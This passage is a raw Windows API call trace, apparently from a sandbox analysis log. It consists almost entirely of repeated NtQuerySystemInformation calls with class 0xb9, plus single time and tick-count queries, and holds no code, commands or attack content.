ResultLength=0x0) [0287.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0287.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x28, ResultLength=0x0) [0287.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x28, ResultLength=0x0) [0287.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x28, ResultLength=0x0) [0287.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x28, ResultLength=0x0) [0287.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0287.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x28, ResultLength=0x0) [0287.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x28, ResultLength=0x0) [0287.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0287.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0287.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0287.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0287.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0287.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0287.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0287.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x20, ResultLength=0x0) [0287.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x20, ResultLength=0x0) [0287.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.244] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d030 | out: lpSystemTimeAsFileTime=0xa78207d030*(dwLowDateTime=0x388c36b3, dwHighDateTime=0x1d6666a)) [0287.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0287.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d020, Length=0x28, ResultLength=0x0) [0287.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf38, Length=0x50, ResultLength=0x0) [0287.245] GetTickCount () returned 0x1187d8a [0287.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce08, Length=0x58, ResultLength=0x0) [0287.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0287.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0287.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0287.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0287.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0287.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x28, ResultLength=0x0) [0287.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0287.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x28, ResultLength=0x0) [0287.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x28, ResultLength=0x0) [0287.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0287.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x20, ResultLength=0x0) [0287.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0287.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0287.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0287.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0287.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x20, ResultLength=0x0) [0287.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0287.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0287.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce08, Length=0x58, ResultLength=0x0) [0287.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0287.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0287.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0287.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0287.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0287.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0287.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0287.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0287.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0287.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0287.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0287.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0287.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0287.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0287.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0287.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0287.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0287.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce08, Length=0x58, ResultLength=0x0) [0287.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0287.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0287.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0287.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0287.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0287.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0287.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x28, ResultLength=0x0) [0287.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0287.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0287.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0287.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) 